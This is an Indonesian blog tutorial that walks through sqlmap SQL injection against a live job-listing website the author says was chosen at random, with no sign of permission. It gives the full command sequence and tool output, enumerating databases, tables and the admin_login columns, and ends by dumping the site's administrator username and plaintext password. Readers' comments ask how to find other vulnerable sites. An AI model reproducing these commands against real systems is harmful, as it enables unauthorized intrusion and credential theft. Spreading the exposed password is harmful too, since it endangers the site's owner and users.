Tutorial sqlmap
Kali ini saya ingin bahas tentang
penggunaan dasar salah satu SQL Injection tools dari platform linux.
Sistem operasi yang saya gunakan yaitu Backtrack 5 R1 turunan dari ubuntu
10.04. Saya ingin bahas tentang sqlmap. Sedikit pengertian tentang
sqlmap menurut saya, sqlmap yaitu salah satu tool untuk melakukan
penetrasi pada suatu website dengan teknik SQL Injection. Tool ini
bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama
fungsinya seperti havij bedanya tool ini jalan di console sedangkan
havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan
penetrasi.
Tulisan ini dibuat dengan tujuan
pembelajaran, gunakan dengan pertanggung jawaban sendiri. Ok, saya akan
coba melakukan penetrasi secara acak, dan saya dapat target http://www.yourparttime.com/ dengan vulnerability di http://www.yourparttime.com/view-jobinfo.php?id=2097′
catatan:1 |
--threads : max number sqlmap untuk membuka concurrent dari koneksi http |
2 |
--random-agent : load random user agent dari default sqlmap, |
root@goldsploit#~:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpallPertama kita akan memfatach banner mysql
1
| root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --banner |
1
| root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --current-user -currrent-db |
1
| root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --dbs |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| web server operating system: Linux Fedora 9 (Sulphur)web application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0[17:13:12] [INFO] fetching database names[17:13:12] [INFO] the SQL query used returns 4 entries[17:13:12] [INFO] starting 4 threads[17:13:13] [INFO] retrieved: ypt_v2[17:13:13] [INFO] retrieved: test[17:13:13] [INFO] retrieved: ypt_db[17:13:13] [INFO] retrieved: information_schemaavailable databases [4]:[*] information_schema[*] test[*] ypt_db[*] ypt_v2[17:13:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'[*] shutting down at 17:13:13 |
1
| root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 --tables |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
| Database: ypt_v2[71 tables]+-----------------------+| a_email_alert || a_sms_alert || ad_setting || admin_login || admin_login_log || agent || agent_inquiry || agent_promo || aging || apply_job || article || book || cc_info || cc_post_process || cc_pre_process || company_industry || company_logo || company_view || credit_history || credit_manage || data_capture || data_employer || data_history || data_publisher || email_alert || email_alert_temp || employee || employee_rate || employer || employer_rate || footer_ad || jane_ads || jane_payout || jane_report || job_category || job_title || launch || launch_sponsor || matching_job || matching_log || meet || news || newsletter || newsletter_achieve || payment || payment_log || polling_1 || post_ad || post_job || post_job_bak || post_job_history || pr_form || promo_history || promotion || publishers || search_resume || search_resume_log || search_shortlist || search_shortlist_log || skm || spec_art || spec_education || spec_hotel || spec_hr || spec_it || spec_sale || spec_service || temporary_remark || top_banner || traceurl || track_referral_code |+----------------------- +[17:15:26] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'[*] shutting down at 17:15:26<pre> |
1
| root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login --columns |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| </pre>web server operating system: Linux Fedora 9 (Sulphur)web application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0[17:19:13] [INFO] fetching columns for table 'admin_login' on database 'ypt_v2'[17:19:14] [INFO] the SQL query used returns 4 entries[17:19:14] [INFO] starting 4 threads[17:19:14] [INFO] retrieved: admin_password[17:19:15] [INFO] retrieved: admin_userid[17:19:15] [INFO] retrieved: admin_name[17:19:15] [INFO] retrieved: admin_id[17:19:15] [INFO] retrieved: varchar(200)[17:19:15] [INFO] retrieved: varchar(200)[17:19:15] [INFO] retrieved: int(11)[17:19:15] [INFO] retrieved: varchar(200)Database: ypt_v2Table: admin_login[4 columns]+--------------------+----------------+| Column | Type |+------------------- +----------------+| admin_id | int(11) || admin_name | varchar(200) || admin_password | varchar(200) || admin_userid | varchar(200) |+--------------------+----------------+[17:19:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'[*] shutting down at 17:19:16<pre> |
1
2
| </pre>root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login -C admin_name,admin_password –dump |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| </pre>web server operating system: Linux Fedora 9 (Sulphur)web application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names> 1[17:22:30] [INFO] fetching columns LIKE 'admin_name, admin_password' for table 'admin_login' on database 'ypt_v2'[17:23:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[17:23:01] [WARNING] if the problem persists please try to lower the number of used threads (--threads)[17:23:19] [INFO] the SQL query used returns 2 entries[17:23:19] [INFO] starting 2 threads[17:23:21] [INFO] retrieved: admin_name[17:23:21] [INFO] retrieved: admin_password[17:23:21] [INFO] retrieved: varchar(200)[17:23:21] [INFO] retrieved: varchar(200)[17:23:22] [INFO] fetching column(s) 'admin_name, admin_password' entries for table 'admin_login' on database 'ypt_v2'[17:23:23] [INFO] the SQL query used returns 1 entries[17:23:23] [INFO] retrieved: Administrator[17:23:23] [INFO] retrieved: ypt01234Database: ypt_v2Table: admin_login[1 entry]+-----------------+---------------------+| admin_name | admin_password |+-----------------+---------------------+| Administrator | ypt01234 |+-----------------+---------------------+<pre> |
Sekian tutorial dasar sqlmap, semoga bermanfaat.
3 comments:
Kalo untuk blogspt bisa ga kang.?
waw keren
cara mencari web yang ada kelemahaannya , gimana caranya???
Post a Comment